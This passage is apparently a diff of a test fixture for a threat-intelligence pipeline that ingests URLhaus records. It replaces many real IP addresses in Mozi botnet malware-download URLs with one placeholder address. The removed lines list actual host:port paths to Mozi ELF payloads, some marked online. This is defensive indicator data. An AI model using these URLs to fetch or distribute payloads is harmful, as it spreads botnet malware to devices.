- "domain": "59.92.181.82",
- "full": "http://59.92.181.82:44976/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:44976/Mozi.m"
 },
- "ip": "59.92.181.82"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693574838Z",
- "original": "{\"id\":\"961264\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961264/\",\"url\":\"http://59.92.181.82:44976/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.92.181.82\",\"date_added\":\"2021-01-14 19:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026533500Z",
+ "original": "{\"id\":\"961264\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961264/\",\"url\":\"http://89.160.20.156:44976/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13711,18 +13711,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://58.249.75.46:51107/Mozi.m",
+ "original": "http://89.160.20.156:51107/Mozi.m",
 "scheme": "http",
 "port": 51107,
- "domain": "58.249.75.46",
- "full": "http://58.249.75.46:51107/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:51107/Mozi.m"
 },
- "ip": "58.249.75.46"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693578465Z",
- "original": "{\"id\":\"961259\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961259/\",\"url\":\"http://58.249.75.46:51107/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.75.46\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026540500Z",
+ "original": "{\"id\":\"961259\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961259/\",\"url\":\"http://89.160.20.156:51107/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13760,18 +13760,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.227.162.7:33790/Mozi.m",
+ "original": "http://89.160.20.156:33790/Mozi.m",
 "scheme": "http",
 "port": 33790,
- "domain": "42.227.162.7",
- "full": "http://42.227.162.7:33790/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:33790/Mozi.m"
 },
- "ip": "42.227.162.7"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693581711Z",
- "original": "{\"id\":\"961260\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961260/\",\"url\":\"http://42.227.162.7:33790/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.227.162.7\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026547400Z",
+ "original": "{\"id\":\"961260\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961260/\",\"url\":\"http://89.160.20.156:33790/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13809,18 +13809,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://219.157.26.241:58919/Mozi.m",
+ "original": "http://89.160.20.156:58919/Mozi.m",
 "scheme": "http",
 "port": 58919,
- "domain": "219.157.26.241",
- "full": "http://219.157.26.241:58919/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:58919/Mozi.m"
 },
- "ip": "219.157.26.241"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693584927Z",
- "original": "{\"id\":\"961261\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961261/\",\"url\":\"http://219.157.26.241:58919/Mozi.m\",\"url_status\":\"online\",\"host\":\"219.157.26.241\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026554300Z",
+ "original": "{\"id\":\"961261\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961261/\",\"url\":\"http://89.160.20.156:58919/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13858,18 +13858,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.93.21.48:40395/Mozi.m",
+ "original": "http://89.160.20.156:40395/Mozi.m",
 "scheme": "http",
 "port": 40395,
- "domain": "59.93.21.48",
- "full": "http://59.93.21.48:40395/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40395/Mozi.m"
 },
- "ip": "59.93.21.48"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693588233Z",
- "original": "{\"id\":\"961262\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961262/\",\"url\":\"http://59.93.21.48:40395/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.21.48\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026561200Z",
+ "original": "{\"id\":\"961262\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961262/\",\"url\":\"http://89.160.20.156:40395/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13907,18 +13907,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.92.216.111:53510/Mozi.m",
+ "original": "http://89.160.20.156:53510/Mozi.m",
 "scheme": "http",
 "port": 53510,
- "domain": "59.92.216.111",
- "full": "http://59.92.216.111:53510/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:53510/Mozi.m"
 },
- "ip": "59.92.216.111"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693591770Z",
- "original": "{\"id\":\"961263\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961263/\",\"url\":\"http://59.92.216.111:53510/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.92.216.111\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026568100Z",
+ "original": "{\"id\":\"961263\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961263/\",\"url\":\"http://89.160.20.156:53510/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13956,18 +13956,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://183.17.147.46:39115/Mozi.m",
+ "original": "http://89.160.20.156:39115/Mozi.m",
 "scheme": "http",
 "port": 39115,
- "domain": "183.17.147.46",
- "full": "http://183.17.147.46:39115/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:39115/Mozi.m"
 },
- "ip": "183.17.147.46"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693594835Z",
- "original": "{\"id\":\"961258\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961258/\",\"url\":\"http://183.17.147.46:39115/Mozi.m\",\"url_status\":\"online\",\"host\":\"183.17.147.46\",\"date_added\":\"2021-01-14 19:05:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026575Z",
+ "original": "{\"id\":\"961258\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961258/\",\"url\":\"http://89.160.20.156:39115/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -14005,18 +14005,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://123.14.93.124:40713/Mozi.m",
+ "original": "http://89.160.20.156:40713/Mozi.m",
 "scheme": "http",
 "port": 40713,
- "domain": "123.14.93.124",
- "full": "http://123.14.93.124:40713/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40713/Mozi.m"
 },
- "ip": "123.14.93.124"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693597971Z",
- "original": "{\"id\":\"961257\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961257/\",\"url\":\"http://123.14.93.124:40713/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.93.124\",\"date_added\":\"2021-01-14 19:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026582Z",
+ "original": "{\"id\":\"961257\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961257/\",\"url\":\"http://89.160.20.156:40713/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -14054,18 +14054,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.59.195.56:54811/Mozi.m",
+ "original": "http://89.160.20.156:54811/Mozi.m",
 "scheme": "http",
 "port": 54811,
- "domain": "182.59.195.56",
- "full": "http://182.59.195.56:54811/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:54811/Mozi.m"
 },
- "ip": "182.59.195.56"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693601107Z",
- "original": "{\"id\":\"961256\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961256/\",\"url\":\"http://182.59.195.56:54811/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.59.195.56\",\"date_added\":\"2021-01-14 19:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026588700Z",
+ "original": "{\"id\":\"961256\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961256/\",\"url\":\"http://89.160.20.156:54811/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -14103,18 +14103,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://153.37.155.55:58269/Mozi.a",
+ "original": "http://89.160.20.156:58269/Mozi.a",
 "scheme": "http",
 "port": 58269,
- "domain": "153.37.155.55",
- "full": "http://153.37.155.55:58269/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:58269/Mozi.a"
 },
- "ip": "153.37.155.55"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693604473Z",
- "original": "{\"id\":\"961255\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961255/\",\"url\":\"http://153.37.155.55:58269/Mozi.a\",\"url_status\":\"online\",\"host\":\"153.37.155.55\",\"date_added\":\"2021-01-14 19:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026595700Z",
+ "original": "{\"id\":\"961255\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961255/\",\"url\":\"http://89.160.20.156:58269/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -14152,18 +14152,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://123.14.95.248:47985/Mozi.m",
+ "original": "http://89.160.20.156:47985/Mozi.m",
 "scheme": "http",
 "port": 47985,
- "domain": "123.14.95.248",
- "full": "http://123.14.95.248:47985/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47985/Mozi.m"
 },
- "ip": "123.14.95.248"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693607680Z",
- "original": "{\"id\":\"961251\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961251/\",\"url\":\"http://123.14.95.248:47985/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.95.248\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026602600Z",
+ "original": "{\"id\":\"961251\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961251/\",\"url\":\"http://89.160.20.156:47985/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -14201,18 +14201,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://185.106.46.2:38107/Mozi.m",
+ "original": "http://89.160.20.156:38107/Mozi.m",
 "scheme": "http",
 "port": 38107,
- "domain": "185.106.46.2",
- "full": "http://185.106.46.2:38107/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:38107/Mozi.m"
 },
- "ip": "185.106.46.2"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693610886Z",
- "original": "{\"id\":\"961252\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961252/\",\"url\":\"http://185.106.46.2:38107/Mozi.m\",\"url_status\":\"online\",\"host\":\"185.106.46.2\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026609500Z",
+ "original": "{\"id\":\"961252\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961252/\",\"url\":\"http://89.160.20.156:38107/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -14250,18 +14250,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://123.14.180.59:50354/Mozi.m",
+ "original": "http://89.160.20.156:50354/Mozi.m",
 "scheme": "http",
 "port": 50354,
- "domain": "123.14.180.59",
- "full": "http://123.14.180.59:50354/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50354/Mozi.m"
 },
- "ip": "123.14.180.59"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693614072Z",
- "original": "{\"id\":\"961253\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961253/\",\"url\":\"http://123.14.180.59:50354/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.180.59\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026616400Z",
+ "original": "{\"id\":\"961253\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961253/\",\"url\":\"http://89.160.20.156:50354/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -14299,18 +14299,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://190.140.131.14:44987/Mozi.m",
+ "original": "http://89.160.20.156:44987/Mozi.m",
 "scheme": "http",
 "port": 44987,
- "domain": "190.140.131.14",
- "full": "http://190.140.131.14:44987/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:44987/Mozi.m"
 },
- "ip": "190.140.131.14"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693617408Z",
- "original": "{\"id\":\"961254\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961254/\",\"url\":\"http://190.140.131.14:44987/Mozi.m\",\"url_status\":\"online\",\"host\":\"190.140.131.14\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026623400Z",
+ "original": "{\"id\":\"961254\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961254/\",\"url\":\"http://89.160.20.156:44987/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -14348,18 +14348,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://125.43.33.108:44681/Mozi.m",
+ "original": "http://89.160.20.156:44681/Mozi.m",
 "scheme": "http",
 "port": 44681,
- "domain": "125.43.33.108",
- "full": "http://125.43.33.108:44681/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:44681/Mozi.m"
 },
- "ip": "125.43.33.108"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693620744Z",
- "original": "{\"id\":\"961249\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961249/\",\"url\":\"http://125.43.33.108:44681/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.43.33.108\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026630200Z",
+ "original": "{\"id\":\"961249\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961249/\",\"url\":\"http://89.160.20.156:44681/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -14397,18 +14397,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://123.14.65.211:58391/Mozi.m",
+ "original": "http://89.160.20.156:58391/Mozi.m",
 "scheme": "http",
 "port": 58391,
- "domain": "123.14.65.211",
- "full": "http://123.14.65.211:58391/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:58391/Mozi.m"
 },
- "ip": "123.14.65.211"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693624030Z",
- "original": "{\"id\":\"961250\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961250/\",\"url\":\"http://123.14.65.211:58391/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.65.211\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026637200Z",
+ "original": "{\"id\":\"961250\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961250/\",\"url\":\"http://89.160.20.156:58391/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -14446,18 +14446,18 @@
"url": {
"path": "/Mozi.a",
"extension": "a",
- "original": "http://117.194.164.34:48540/Mozi.a",
+ "original": "http://89.160.20.156:48540/Mozi.a",
"scheme": "http",
"port": 48540,
- "domain": "117.194.164.34",
- "full": "http://117.194.164.34:48540/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:48540/Mozi.a"
},
- "ip": "117.194.164.34"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693627256Z",
- "original": "{\"id\":\"961248\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961248/\",\"url\":\"http://117.194.164.34:48540/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.194.164.34\",\"date_added\":\"2021-01-14 19:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026644100Z",
+ "original": "{\"id\":\"961248\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961248/\",\"url\":\"http://89.160.20.156:48540/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -14495,18 +14495,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://115.48.13.187:42755/Mozi.m",
+ "original": "http://89.160.20.156:42755/Mozi.m",
"scheme": "http",
"port": 42755,
- "domain": "115.48.13.187",
- "full": "http://115.48.13.187:42755/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:42755/Mozi.m"
},
- "ip": "115.48.13.187"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693630593Z",
- "original": "{\"id\":\"961246\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961246/\",\"url\":\"http://115.48.13.187:42755/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.13.187\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026651100Z",
+ "original": "{\"id\":\"961246\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961246/\",\"url\":\"http://89.160.20.156:42755/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -14544,18 +14544,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://113.87.249.28:52688/Mozi.m",
